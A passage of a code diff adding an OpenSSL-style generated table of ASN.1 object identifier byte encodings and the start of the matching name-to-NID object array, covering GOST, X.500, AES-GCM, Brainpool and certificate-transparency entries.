+0x2A,0x85,0x03,0x02,0x02,0x23,0x02,          /* [5591] OBJ_id_GostR3410_2001_CryptoPro_B_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x23,0x03,          /* [5598] OBJ_id_GostR3410_2001_CryptoPro_C_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x24,0x00,          /* [5605] OBJ_id_GostR3410_2001_CryptoPro_XchA_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x24,0x01,          /* [5612] OBJ_id_GostR3410_2001_CryptoPro_XchB_ParamSet */
+0x2A,0x85,0x03,0x02,0x02,0x14,0x01,          /* [5619] OBJ_id_GostR3410_94_a */
+0x2A,0x85,0x03,0x02,0x02,0x14,0x02,          /* [5626] OBJ_id_GostR3410_94_aBis */
+0x2A,0x85,0x03,0x02,0x02,0x14,0x03,          /* [5633] OBJ_id_GostR3410_94_b */
+0x2A,0x85,0x03,0x02,0x02,0x14,0x04,          /* [5640] OBJ_id_GostR3410_94_bBis */
+0x2A,0x85,0x03,0x02,0x09,0x01,0x06,0x01,     /* [5647] OBJ_id_Gost28147_89_cc */
+0x2A,0x85,0x03,0x02,0x09,0x01,0x05,0x03,     /* [5655] OBJ_id_GostR3410_94_cc */
+0x2A,0x85,0x03,0x02,0x09,0x01,0x05,0x04,     /* [5663] OBJ_id_GostR3410_2001_cc */
+0x2A,0x85,0x03,0x02,0x09,0x01,0x03,0x03,     /* [5671] OBJ_id_GostR3411_94_with_GostR3410_94_cc */
+0x2A,0x85,0x03,0x02,0x09,0x01,0x03,0x04,     /* [5679] OBJ_id_GostR3411_94_with_GostR3410_2001_cc */
+0x2A,0x85,0x03,0x02,0x09,0x01,0x08,0x01,     /* [5687] OBJ_id_GostR3410_2001_ParamSet_cc */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x11,0x02,/* [5695] OBJ_LocalKeySet */
+0x55,0x1D,0x2E,                              /* [5704] OBJ_freshest_crl */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x08,0x03,     /* [5707] OBJ_id_on_permanentIdentifier */
+0x55,0x04,0x0E,                              /* [5715] OBJ_searchGuide */
+0x55,0x04,0x0F,                              /* [5718] OBJ_businessCategory */
+0x55,0x04,0x10,                              /* [5721] OBJ_postalAddress */
+0x55,0x04,0x12,                              /* [5724] OBJ_postOfficeBox */
+0x55,0x04,0x13,                              /* [5727] OBJ_physicalDeliveryOfficeName */
+0x55,0x04,0x14,                              /* [5730] OBJ_telephoneNumber */
+0x55,0x04,0x15,                              /* [5733] OBJ_telexNumber */
+0x55,0x04,0x16,                              /* [5736] OBJ_teletexTerminalIdentifier */
+0x55,0x04,0x17,                              /* [5739] OBJ_facsimileTelephoneNumber */
+0x55,0x04,0x18,                              /* [5742] OBJ_x121Address */
+0x55,0x04,0x19,                              /* [5745] OBJ_internationaliSDNNumber */
+0x55,0x04,0x1A,                              /* [5748] OBJ_registeredAddress */
+0x55,0x04,0x1B,                              /* [5751] OBJ_destinationIndicator */
+0x55,0x04,0x1C,                              /* [5754] OBJ_preferredDeliveryMethod */
+0x55,0x04,0x1D,                              /* [5757] OBJ_presentationAddress */
+0x55,0x04,0x1E,                              /* [5760] OBJ_supportedApplicationContext */
+0x55,0x04,0x1F,                              /* [5763] OBJ_member */
+0x55,0x04,0x20,                              /* [5766] OBJ_owner */
+0x55,0x04,0x21,                              /* [5769] OBJ_roleOccupant */
+0x55,0x04,0x22,                              /* [5772] OBJ_seeAlso */
+0x55,0x04,0x23,                              /* [5775] OBJ_userPassword */
+0x55,0x04,0x24,                              /* [5778] OBJ_userCertificate */
+0x55,0x04,0x25,                              /* [5781] OBJ_cACertificate */
+0x55,0x04,0x26,                              /* [5784] OBJ_authorityRevocationList */
+0x55,0x04,0x27,                              /* [5787] OBJ_certificateRevocationList */
+0x55,0x04,0x28,                              /* [5790] OBJ_crossCertificatePair */
+0x55,0x04,0x2F,                              /* [5793] OBJ_enhancedSearchGuide */
+0x55,0x04,0x30,                              /* [5796] OBJ_protocolInformation */
+0x55,0x04,0x31,                              /* [5799] OBJ_distinguishedName */
+0x55,0x04,0x32,                              /* [5802] OBJ_uniqueMember */
+0x55,0x04,0x33,                              /* [5805] OBJ_houseIdentifier */
+0x55,0x04,0x34,                              /* [5808] OBJ_supportedAlgorithms */
+0x55,0x04,0x35,                              /* [5811] OBJ_deltaRevocationList */
+0x55,0x04,0x36,                              /* [5814] OBJ_dmdName */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x03,0x09,/* [5817] OBJ_id_alg_PWRI_KEK */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x06,/* [5828] OBJ_aes_128_gcm */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x07,/* [5837] OBJ_aes_128_ccm */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x08,/* [5846] OBJ_id_aes128_wrap_pad */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x1A,/* [5855] OBJ_aes_192_gcm */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x1B,/* [5864] OBJ_aes_192_ccm */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x1C,/* [5873] OBJ_id_aes192_wrap_pad */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x2E,/* [5882] OBJ_aes_256_gcm */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x2F,/* [5891] OBJ_aes_256_ccm */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x30,/* [5900] OBJ_id_aes256_wrap_pad */
+0x2A,0x83,0x08,0x8C,0x9A,0x4B,0x3D,0x01,0x01,0x03,0x02,/* [5909] OBJ_id_camellia128_wrap */
+0x2A,0x83,0x08,0x8C,0x9A,0x4B,0x3D,0x01,0x01,0x03,0x03,/* [5920] OBJ_id_camellia192_wrap */
+0x2A,0x83,0x08,0x8C,0x9A,0x4B,0x3D,0x01,0x01,0x03,0x04,/* [5931] OBJ_id_camellia256_wrap */
+0x55,0x1D,0x25,0x00,                         /* [5942] OBJ_anyExtendedKeyUsage */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x08,/* [5946] OBJ_mgf1 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x0A,/* [5955] OBJ_rsassaPss */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x07,/* [5964] OBJ_rsaesOaep */
+0x2A,0x86,0x48,0xCE,0x3E,0x02,0x01,          /* [5973] OBJ_dhpublicnumber */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x01,/* [5980] OBJ_brainpoolP160r1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x02,/* [5989] OBJ_brainpoolP160t1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x03,/* [5998] OBJ_brainpoolP192r1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x04,/* [6007] OBJ_brainpoolP192t1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x05,/* [6016] OBJ_brainpoolP224r1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x06,/* [6025] OBJ_brainpoolP224t1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x07,/* [6034] OBJ_brainpoolP256r1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x08,/* [6043] OBJ_brainpoolP256t1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x09,/* [6052] OBJ_brainpoolP320r1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x0A,/* [6061] OBJ_brainpoolP320t1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x0B,/* [6070] OBJ_brainpoolP384r1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x0C,/* [6079] OBJ_brainpoolP384t1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x0D,/* [6088] OBJ_brainpoolP512r1 */
+0x2B,0x24,0x03,0x03,0x02,0x08,0x01,0x01,0x0E,/* [6097] OBJ_brainpoolP512t1 */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x09,/* [6106] OBJ_pSpecified */
+0x2B,0x81,0x05,0x10,0x86,0x48,0x3F,0x00,0x02,/* [6115] OBJ_dhSinglePass_stdDH_sha1kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0B,0x00,               /* [6124] OBJ_dhSinglePass_stdDH_sha224kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0B,0x01,               /* [6130] OBJ_dhSinglePass_stdDH_sha256kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0B,0x02,               /* [6136] OBJ_dhSinglePass_stdDH_sha384kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0B,0x03,               /* [6142] OBJ_dhSinglePass_stdDH_sha512kdf_scheme */
+0x2B,0x81,0x05,0x10,0x86,0x48,0x3F,0x00,0x03,/* [6148] OBJ_dhSinglePass_cofactorDH_sha1kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0E,0x00,               /* [6157] OBJ_dhSinglePass_cofactorDH_sha224kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0E,0x01,               /* [6163] OBJ_dhSinglePass_cofactorDH_sha256kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0E,0x02,               /* [6169] OBJ_dhSinglePass_cofactorDH_sha384kdf_scheme */
+0x2B,0x81,0x04,0x01,0x0E,0x03,               /* [6175] OBJ_dhSinglePass_cofactorDH_sha512kdf_scheme */
+0x2B,0x06,0x01,0x04,0x01,0xD6,0x79,0x02,0x04,0x02,/* [6181] OBJ_ct_precert_scts */
+0x2B,0x06,0x01,0x04,0x01,0xD6,0x79,0x02,0x04,0x03,/* [6191] OBJ_ct_precert_poison */
+0x2B,0x06,0x01,0x04,0x01,0xD6,0x79,0x02,0x04,0x04,/* [6201] OBJ_ct_precert_signer */
+0x2B,0x06,0x01,0x04,0x01,0xD6,0x79,0x02,0x04,0x05,/* [6211] OBJ_ct_cert_scts */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x3C,0x02,0x01,0x01,/* [6221] OBJ_jurisdictionLocalityName */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x3C,0x02,0x01,0x02,/* [6232] OBJ_jurisdictionStateOrProvinceName */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x3C,0x02,0x01,0x03,/* [6243] OBJ_jurisdictionCountryName */
+};
+
+static const ASN1_OBJECT nid_objs[NUM_NID]={
+{"UNDEF","undefined",NID_undef,0,NULL,0},
+{"rsadsi","RSA Data Security, Inc.",NID_rsadsi,6,&(lvalues[0]),0},
+{"pkcs","RSA Data Security, Inc. PKCS",NID_pkcs,7,&(lvalues[6]),0},
+{"MD2","md2",NID_md2,8,&(lvalues[13]),0},
+{"MD5","md5",NID_md5,8,&(lvalues[21]),0},
+{"RC4","rc4",NID_rc4,8,&(lvalues[29]),0},
+{"rsaEncryption","rsaEncryption",NID_rsaEncryption,9,&(lvalues[37]),0},
+{"RSA-MD2","md2WithRSAEncryption",NID_md2WithRSAEncryption,9,
+	&(lvalues[46]),0},
+{"RSA-MD5","md5WithRSAEncryption",NID_md5WithRSAEncryption,9,
+	&(lvalues[55]),0},
+{"PBE-MD2-DES","pbeWithMD2AndDES-CBC",NID_pbeWithMD2AndDES_CBC,9,
+	&(lvalues[64]),0},
+{"PBE-MD5-DES","pbeWithMD5AndDES-CBC",NID_pbeWithMD5AndDES_CBC,9,
+	&(lvalues[73]),0},
+{"X500","directory services (X.500)",NID_X500,1,&(lvalues[82]),0},
+{"X509","X509",NID_X509,2,&(lvalues[83]),0},
+{"CN","commonName",NID_commonName,3,&(lvalues[85]),0},
+{"C","countryName",NID_countryName,3,&(lvalues[88]),0},
+{"L","localityName",NID_localityName,3,&(lvalues[91]),0},
+{"ST","stateOrProvinceName",NID_stateOrProvinceName,3,&(lvalues[94]),0},
+{"O","organizationName",NID_organizationName,3,&(lvalues[97]),0},
+{"OU","organizationalUnitName",NID_organizationalUnitName,3,
+	&(lvalues[100]),0},
+{"RSA","rsa",NID_rsa,4,&(lvalues[103]),0},
+{"pkcs7","pkcs7",NID_pkcs7,8,&(lvalues[107]),0},
+{"pkcs7-data","pkcs7-data",NID_pkcs7_data,9,&(lvalues[115]),0},
+{"pkcs7-signedData","pkcs7-signedData",NID_pkcs7_signed,9,
+	&(lvalues[124]),0},
+{"pkcs7-envelopedData","pkcs7-envelopedData",NID_pkcs7_enveloped,9,
+	&(lvalues[133]),0},
+{"pkcs7-signedAndEnvelopedData","pkcs7-signedAndEnvelopedData",
+	NID_pkcs7_signedAndEnveloped,9,&(lvalues[142]),0},
+{"pkcs7-digestData","pkcs7-digestData",NID_pkcs7_digest,9,
+	&(lvalues[151]),0},
+{"pkcs7-encryptedData","pkcs7-encryptedData",NID_pkcs7_encrypted,9,
+	&(lvalues[160]),0},
+{"pkcs3","pkcs3",NID_pkcs3,8,&(lvalues[169]),0},
+{"dhKeyAgreement","dhKeyAgreement",NID_dhKeyAgreement,9,
+	&(lvalues[177]),0},
+{"DES-ECB","des-ecb",NID_des_ecb,5,&(lvalues[186]),0},
+{"DES-CFB","des-cfb",NID_des_cfb64,5,&(lvalues[191]),0},
+{"DES-CBC","des-cbc",NID_des_cbc,5,&(lvalues[196]),0},
+{"DES-EDE","des-ede",NID_des_ede_ecb,5,&(lvalues[201]),0},
+{"DES-EDE3","des-ede3",NID_des_ede3_ecb,0,NULL,0},
+{"IDEA-CBC","idea-cbc",NID_idea_cbc,11,&(lvalues[206]),0},
+{"IDEA-CFB","idea-cfb",NID_idea_cfb64,0,NULL,0},
+{"IDEA-ECB","idea-ecb",NID_idea_ecb,0,NULL,0},
+{"RC2-CBC","rc2-cbc",NID_rc2_cbc,8,&(lvalues[217]),0},
+{"RC2-ECB","rc2-ecb",NID_rc2_ecb,0,NULL,0},
+{"RC2-CFB","rc2-cfb",NID_rc2_cfb64,0,NULL,0},
+{"RC2-OFB","rc2-ofb",NID_rc2_ofb64,0,NULL,0},
+{"SHA","sha",NID_sha,5,&(lvalues[225]),0},
+{"RSA-SHA","shaWithRSAEncryption",NID_shaWithRSAEncryption,5,
+	&(lvalues[230]),0},
+{"DES-EDE-CBC","des-ede-cbc",NID_des_ede_cbc,0,NULL,0},
+{"DES-EDE3-CBC","des-ede3-cbc",NID_des_ede3_cbc,8,&(lvalues[235]),0},
+{"DES-OFB","des-ofb",NID_des_ofb64,5,&(lvalues[243]),0},
+{"IDEA-OFB","idea-ofb",NID_idea_ofb64,0,NULL,0},
+{"pkcs9","pkcs9",NID_pkcs9,8,&(lvalues[248]),0},
+{"emailAddress","emailAddress",NID_pkcs9_emailAddress,9,
+	&(lvalues[256]),0},
+{"unstructuredName","unstructuredName",NID_pkcs9_unstructuredName,9,
+	&(lvalues[265]),0},
+{"contentType","contentType",NID_pkcs9_contentType,9,&(lvalues[274]),0},
+{"messageDigest","messageDigest",NID_pkcs9_messageDigest,9,
+	&(lvalues[283]),0},
+{"signingTime","signingTime",NID_pkcs9_signingTime,9,&(lvalues[292]),0},
+{"countersignature","countersignature",NID_pkcs9_countersignature,9,
+	&(lvalues[301]),0},
+{"challengePassword","challengePassword",NID_pkcs9_challengePassword,
+	9,&(lvalues[310]),0},
+{"unstructuredAddress","unstructuredAddress",
+	NID_pkcs9_unstructuredAddress,9,&(lvalues[319]),0},
+{"extendedCertificateAttributes","extendedCertificateAttributes",
+	NID_pkcs9_extCertAttributes,9,&(lvalues[328]),0},
+{"Netscape","Netscape Communications Corp.",NID_netscape,7,
+	&(lvalues[337]),0},
+{"nsCertExt","Netscape Certificate Extension",
+	NID_netscape_cert_extension,8,&(lvalues[344]),0},
+{"nsDataType","Netscape Data Type",NID_netscape_data_type,8,
+	&(lvalues[352]),0},
+{"DES-EDE-CFB","des-ede-cfb",NID_des_ede_cfb64,0,NULL,0},
+{"DES-EDE3-CFB","des-ede3-cfb",NID_des_ede3_cfb64,0,NULL,0},
+{"DES-EDE-OFB","des-ede-ofb",NID_des_ede_ofb64,0,NULL,0},
+{"DES-EDE3-OFB","des-ede3-ofb",NID_des_ede3_ofb64,0,NULL,0},
+{"SHA1","sha1",NID_sha1,5,&(lvalues[360]),0},
+{"RSA-SHA1","sha1WithRSAEncryption",NID_sha1WithRSAEncryption,9,
+	&(lvalues[365]),0},
+{"DSA-SHA","dsaWithSHA",NID_dsaWithSHA,5,&(lvalues[374]),0},
+{"DSA-old","dsaEncryption-old",NID_dsa_2,5,&(lvalues[379]),0},
+{"PBE-SHA1-RC2-64","pbeWithSHA1AndRC2-CBC",NID_pbeWithSHA1AndRC2_CBC,
+	9,&(lvalues[384]),0},
+{"PBKDF2","PBKDF2",NID_id_pbkdf2,9,&(lvalues[393]),0},
+{"DSA-SHA1-old","dsaWithSHA1-old",NID_dsaWithSHA1_2,5,&(lvalues[402]),0},
+{"nsCertType","Netscape Cert Type",NID_netscape_cert_type,9,
+	&(lvalues[407]),0},
+{"nsBaseUrl","Netscape Base Url",NID_netscape_base_url,9,
+	&(lvalues[416]),0},
+{"nsRevocationUrl","Netscape Revocation Url",
+	NID_netscape_revocation_url,9,&(lvalues[425]),0},
+{"nsCaRevocationUrl","Netscape CA Revocation Url",
+	NID_netscape_ca_revocation_url,9,&(lvalues[434]),0},
+{"nsRenewalUrl","Netscape Renewal Url",NID_netscape_renewal_url,9,
+	&(lvalues[443]),0},
+{"nsCaPolicyUrl","Netscape CA Policy Url",NID_netscape_ca_policy_url,
+	9,&(lvalues[452]),0},
+{"nsSslServerName","Netscape SSL Server Name",
+	NID_netscape_ssl_server_name,9,&(lvalues[461]),0},
+{"nsComment","Netscape Comment",NID_netscape_comment,9,&(lvalues[470]),0},
+{"nsCertSequence","Netscape Certificate Sequence",
+	NID_netscape_cert_sequence,9,&(lvalues[479]),0},
+{"DESX-CBC","desx-cbc",NID_desx_cbc,0,NULL,0},
+{"id-ce","id-ce",NID_id_ce,2,&(lvalues[488]),0},
+{"subjectKeyIdentifier","X509v3 Subject Key Identifier",
+	NID_subject_key_identifier,3,&(lvalues[490]),0},
+{"keyUsage","X509v3 Key Usage",NID_key_usage,3,&(lvalues[493]),0},
+{"privateKeyUsagePeriod","X509v3 Private Key Usage Period",
+	NID_private_key_usage_period,3,&(lvalues[496]),0},
+{"subjectAltName","X509v3 Subject Alternative Name",
+	NID_subject_alt_name,3,&(lvalues[499]),0},
+{"issuerAltName","X509v3 Issuer Alternative Name",NID_issuer_alt_name,
+	3,&(lvalues[502]),0},
+{"basicConstraints","X509v3 Basic Constraints",NID_basic_constraints,
+	3,&(lvalues[505]),0},
+{"crlNumber","X509v3 CRL Number",NID_crl_number,3,&(lvalues[508]),0},
+{"certificatePolicies","X509v3 Certificate Policies",
+	NID_certificate_policies,3,&(lvalues[511]),0},
+{"authorityKeyIdentifier","X509v3 Authority Key Identifier",
+	NID_authority_key_identifier,3,&(lvalues[514]),0},
+{"BF-CBC","bf-cbc",NID_bf_cbc,9,&(lvalues[517]),0},
+{"BF-ECB","bf-ecb",NID_bf_ecb,0,NULL,0},
+{"BF-CFB","bf-cfb",NID_bf_cfb64,0,NULL,0},
+{"BF-OFB","bf-ofb",NID_bf_ofb64,0,NULL,0},
+{"MDC2","mdc2",NID_mdc2,4,&(lvalues[526]),0},
+{"RSA-MDC2","mdc2WithRSA",NID_mdc2WithRSA,4,&(lvalues[530]),0},
+{"RC4-40","rc4-40",NID_rc4_40,0,NULL,0},
+{"RC2-40-CBC","rc2-40-cbc",NID_rc2_40_cbc,0,NULL,0},
+{"GN","givenName",NID_givenName,3,&(lvalues[534]),0},
+{"SN","surname",NID_surname,3,&(lvalues[537]),0},
+{"initials","initials",NID_initials,3,&(lvalues[540]),0},
+{NULL,NULL,NID_undef,0,NULL,0},
+{"crlDistributionPoints","X509v3 CRL Distribution Points",
+	NID_crl_distribution_points,3,&(lvalues[543]),0},
+{"RSA-NP-MD5","md5WithRSA",NID_md5WithRSA,5,&(lvalues[546]),0},
+{"serialNumber","serialNumber",NID_serialNumber,3,&(lvalues[551]),0},
+{"title","title",NID_title,3,&(lvalues[554]),0},
+{"description","description",NID_description,3,&(lvalues[557]),0},
+{"CAST5-CBC","cast5-cbc",NID_cast5_cbc,9,&(lvalues[560]),0},
+{"CAST5-ECB","cast5-ecb",NID_cast5_ecb,0,NULL,0},
+{"CAST5-CFB","cast5-cfb",NID_cast5_cfb64,0,NULL,0},
+{"CAST5-OFB","cast5-ofb",NID_cast5_ofb64,0,NULL,0},
+{"pbeWithMD5AndCast5CBC","pbeWithMD5AndCast5CBC",
+	NID_pbeWithMD5AndCast5_CBC,9,&(lvalues[569]),0},
+{"DSA-SHA1","dsaWithSHA1",NID_dsaWithSHA1,7,&(lvalues[578]),0},
+{"MD5-SHA1","md5-sha1",NID_md5_sha1,0,NULL,0},
+{"RSA-SHA1-2","sha1WithRSA",NID_sha1WithRSA,5,&(lvalues[585]),0},
+{"DSA","dsaEncryption",NID_dsa,7,&(lvalues[590]),0},
+{"RIPEMD160","ripemd160",NID_ripemd160,5,&(lvalues[597]),0},
+{NULL,NULL,NID_undef,0,NULL,0},
+{"RSA-RIPEMD160","ripemd160WithRSA",NID_ripemd160WithRSA,6,
+	&(lvalues[602]),0},
+{"RC5-CBC","rc5-cbc",NID_rc5_cbc,8,&(lvalues[608]),0},
+{"RC5-ECB","rc5-ecb",NID_rc5_ecb,0,NULL,0},
+{"RC5-CFB","rc5-cfb",NID_rc5_cfb64,0,NULL,0},
+{"RC5-OFB","rc5-ofb",NID_rc5_ofb64,0,NULL,0},
+{"RLE","run length compression",NID_rle_compression,6,&(lvalues[616]),0},
+{"ZLIB","zlib compression",NID_zlib_compression,11,&(lvalues[622]),0},
+{"extendedKeyUsage","X509v3 Extended Key Usage",NID_ext_key_usage,3,
+	&(lvalues[633]),0},
+{"PKIX","PKIX",NID_id_pkix,6,&(lvalues[636]),0},
+{"id-kp","id-kp",NID_id_kp,7,&(lvalues[642]),0},
+{"serverAuth","TLS Web Server Authentication",NID_server_auth,8,
+	&(lvalues[649]),0},
+{"clientAuth","TLS Web Client Authentication",NID_client_auth,8,
+	&(lvalues[657]),0},
+{"codeSigning","Code Signing",NID_code_sign,8,&(lvalues[665]),0},
+{"emailProtection","E-mail Protection",NID_email_protect,8,
+	&(lvalues[673]),0},
+{"timeStamping","Time Stamping",NID_time_stamp,8,&(lvalues[681]),0},
+{"msCodeInd","Microsoft Individual Code Signing",NID_ms_code_ind,10,
+	&(lvalues[689]),0},
+{"msCodeCom","Microsoft Commercial Code Signing",NID_ms_code_com,10,
+	&(lvalues[699]),0},
+{"msCTLSign","Microsoft Trust List Signing",NID_ms_ctl_sign,10,
+	&(lvalues[709]),0},
+{"msSGC","Microsoft Server Gated Crypto",NID_ms_sgc,10,&(lvalues[719]),0},
+{"msEFS","Microsoft Encrypted File System",NID_ms_efs,10,
+	&(lvalues[729]),0},
+{"nsSGC","Netscape Server Gated Crypto",NID_ns_sgc,9,&(lvalues[739]),0},
+{"deltaCRL","X509v3 Delta CRL Indicator",NID_delta_crl,3,
+	&(lvalues[748]),0},
+{"CRLReason","X509v3 CRL Reason Code",NID_crl_reason,3,&(lvalues[751]),0},
+{"invalidityDate","Invalidity Date",NID_invalidity_date,3,
+	&(lvalues[754]),0},
+{"SXNetID","Strong Extranet ID",NID_sxnet,5,&(lvalues[757]),0},
+{"PBE-SHA1-RC4-128","pbeWithSHA1And128BitRC4",
+	NID_pbe_WithSHA1And128BitRC4,10,&(lvalues[762]),0},
+{"PBE-SHA1-RC4-40","pbeWithSHA1And40BitRC4",
+	NID_pbe_WithSHA1And40BitRC4,10,&(lvalues[772]),0},
+{"PBE-SHA1-3DES","pbeWithSHA1And3-KeyTripleDES-CBC",
+	NID_pbe_WithSHA1And3_Key_TripleDES_CBC,10,&(lvalues[782]),0},
+{"PBE-SHA1-2DES","pbeWithSHA1And2-KeyTripleDES-CBC",
+	NID_pbe_WithSHA1And2_Key_TripleDES_CBC,10,&(lvalues[792]),0},
+{"PBE-SHA1-RC2-128","pbeWithSHA1And128BitRC2-CBC",
+	NID_pbe_WithSHA1And128BitRC2_CBC,10,&(lvalues[802]),0},
+{"PBE-SHA1-RC2-40","pbeWithSHA1And40BitRC2-CBC",
+	NID_pbe_WithSHA1And40BitRC2_CBC,10,&(lvalues[812]),0},
+{"keyBag","keyBag",NID_keyBag,11,&(lvalues[822]),0},
+{"pkcs8ShroudedKeyBag","pkcs8ShroudedKeyBag",NID_pkcs8ShroudedKeyBag,
+	11,&(lvalues[833]),0},
+{"certBag","certBag",NID_certBag,11,&(lvalues[844]),0},
+{"crlBag","crlBag",NID_crlBag,11,&(lvalues[855]),0},
+{"secretBag","secretBag",NID_secretBag,11,&(lvalues[866]),0},
+{"safeContentsBag","safeContentsBag",NID_safeContentsBag,11,
+	&(lvalues[877]),0},
+{"friendlyName","friendlyName",NID_friendlyName,9,&(lvalues[888]),0},
+{"localKeyID","localKeyID",NID_localKeyID,9,&(lvalues[897]),0},
+{"x509Certificate","x509Certificate",NID_x509Certificate,10,
+	&(lvalues[906]),0},
+{"sdsiCertificate","sdsiCertificate",NID_sdsiCertificate,10,
+	&(lvalues[916]),0},
+{"x509Crl","x509Crl",NID_x509Crl,10,&(lvalues[926]),0},
+{"PBES2","PBES2",NID_pbes2,9,&(lvalues[936]),0},
+{"PBMAC1","PBMAC1",NID_pbmac1,9,&(lvalues[945]),0},
+{"hmacWithSHA1","hmacWithSHA1",NID_hmacWithSHA1,8,&(lvalues[954]),0},
+{"id-qt-cps","Policy Qualifier CPS",NID_id_qt_cps,8,&(lvalues[962]),0},
+{"id-qt-unotice","Policy Qualifier User Notice",NID_id_qt_unotice,8,
+	&(lvalues[970]),0},
+{"RC2-64-CBC","rc2-64-cbc",NID_rc2_64_cbc,0,NULL,0},
+{"SMIME-CAPS","S/MIME Capabilities",NID_SMIMECapabilities,9,
+	&(lvalues[978]),0},
+{"PBE-MD2-RC2-64","pbeWithMD2AndRC2-CBC",NID_pbeWithMD2AndRC2_CBC,9,
+	&(lvalues[987]),0},
+{"PBE-MD5-RC2-64","pbeWithMD5AndRC2-CBC",NID_pbeWithMD5AndRC2_CBC,9,
+	&(lvalues[996]),0},
+{"PBE-SHA1-DES","pbeWithSHA1AndDES-CBC",NID_pbeWithSHA1AndDES_CBC,9,
+	&(lvalues[1005]),0},
+{"msExtReq","Microsoft Extension Request",NID_ms_ext_req,10,
+	&(lvalues[1014]),0},
+{"extReq","Extension Request",NID_ext_req,9,&(lvalues[1024]),0},
+{"name","name",NID_name,3,&(lvalues[1033]),0},
+{"dnQualifier","dnQualifier",NID_dnQualifier,3,&(lvalues[1036]),0},
+{"id-pe","id-pe",NID_id_pe,7,&(lvalues[1039]),0},
+{"id-ad","id-ad",NID_id_ad,7,&(lvalues[1046]),0},
+{"authorityInfoAccess","Authority Information Access",NID_info_access,
+	8,&(lvalues[1053]),0},
+{"OCSP","OCSP",NID_ad_OCSP,8,&(lvalues[1061]),0},
+{"caIssuers","CA Issuers",NID_ad_ca_issuers,8,&(lvalues[1069]),0},
+{"OCSPSigning","OCSP Signing",NID_OCSP_sign,8,&(lvalues[1077]),0},
+{"ISO","iso",NID_iso,0,NULL,0},
+{"member-body","ISO Member Body",NID_member_body,1,&(lvalues[1085]),0},
+{"ISO-US","ISO US Member Body",NID_ISO_US,3,&(lvalues[1086]),0},
+{"X9-57","X9.57",NID_X9_57,5,&(lvalues[1089]),0},
+{"X9cm","X9.57 CM ?",NID_X9cm,6,&(lvalues[1094]),0},
+{"pkcs1","pkcs1",NID_pkcs1,8,&(lvalues[1100]),0},
+{"pkcs5","pkcs5",NID_pkcs5,8,&(lvalues[1108]),0},
+{"SMIME","S/MIME",NID_SMIME,9,&(lvalues[1116]),0},
+{"id-smime-mod","id-smime-mod",NID_id_smime_mod,10,&(lvalues[1125]),0},
+{"id-smime-ct","id-smime-ct",NID_id_smime_ct,10,&(lvalues[1135]),0},
+{"id-smime-aa","id-smime-aa",NID_id_smime_aa,10,&(lvalues[1145]),0},
+{"id-smime-alg","id-smime-alg",NID_id_smime_alg,10,&(lvalues[1155]),0},
+{"id-smime-cd","id-smime-cd",NID_id_smime_cd,10,&(lvalues[1165]),0},
+{"id-smime-spq","id-smime-spq",NID_id_smime_spq,10,&(lvalues[1175]),0},
+{"id-smime-cti","id-smime-cti",NID_id_smime_cti,10,&(lvalues[1185]),0},
+{"id-smime-mod-cms","id-smime-mod-cms",NID_id_smime_mod_cms,11,
+	&(lvalues[1195]),0},
+{"id-smime-mod-ess","id-smime-mod-ess",NID_id_smime_mod_ess,11,
+	&(lvalues[1206]),0},
+{"id-smime-mod-oid","id-smime-mod-oid",NID_id_smime_mod_oid,11,
+	&(lvalues[1217]),0},
+{"id-smime-mod-msg-v3","id-smime-mod-msg-v3",NID_id_smime_mod_msg_v3,
+	11,&(lvalues[1228]),0},
+{"id-smime-mod-ets-eSignature-88","id-smime-mod-ets-eSignature-88",
+	NID_id_smime_mod_ets_eSignature_88,11,&(lvalues[1239]),0},
+{"id-smime-mod-ets-eSignature-97","id-smime-mod-ets-eSignature-97",
+	NID_id_smime_mod_ets_eSignature_97,11,&(lvalues[1250]),0},
+{"id-smime-mod-ets-eSigPolicy-88","id-smime-mod-ets-eSigPolicy-88",
+	NID_id_smime_mod_ets_eSigPolicy_88,11,&(lvalues[1261]),0},
